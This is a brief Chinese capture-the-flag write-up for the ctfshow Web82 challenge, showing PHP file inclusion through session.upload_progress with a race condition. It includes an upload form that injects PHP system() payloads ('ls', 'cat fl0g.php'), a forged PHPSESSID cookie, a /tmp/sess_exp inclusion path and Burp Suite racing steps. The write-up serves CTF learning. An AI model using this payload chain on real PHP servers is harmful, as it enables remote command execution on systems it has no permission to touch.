文件包涵条件竞争(ctfshow82)

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
AI绘画小3326 分钟前
【网络安全】IP 核心技能:获取、伪造、隐藏与挖掘
网络·tcp/ip·安全·web安全·网络安全
介一安全44 分钟前
【Frida Android】实战篇7:SSL Pinning 证书绑定绕过 Hook 教程阶段总结
android·网络安全·逆向·安全性测试·frida
Whoami!1 小时前
⸢ 拾陆-V⸥⤳ 安全数智化建设:安全智能平台(上)▸概述
网络安全·信息安全·ai安全
XH-hui7 小时前
【打靶日记】TheHackerLabs 之 THLPWN
linux·网络安全·thehackerlabs·thl
NewCarRen14 小时前
自动驾驶安全评估框架:基于物理的功能能力测试
网络安全·自动驾驶·汽车
JM丫15 小时前
内网理论知识总结
笔记·网络安全
麦烤楽鸡翅15 小时前
坚持60s (攻防世界)
java·网络安全·jar·ctf·misc·反编译·攻防世界
武汉唯众智创21 小时前
网络安全教学升级!基于深度强化学习的动态对抗网络安全防护教学方案全解析
网络·人工智能·安全·web安全·生成对抗网络·网络安全
NewCarRen1 天前
汽车蓝牙信息娱乐系统隐私风险:攻击分析与防御策略
网络安全·汽车
NewCarRen1 天前
智能电动汽车网络安全与功能安全融合框架构建及验证
网络安全·汽车·汽车网络安全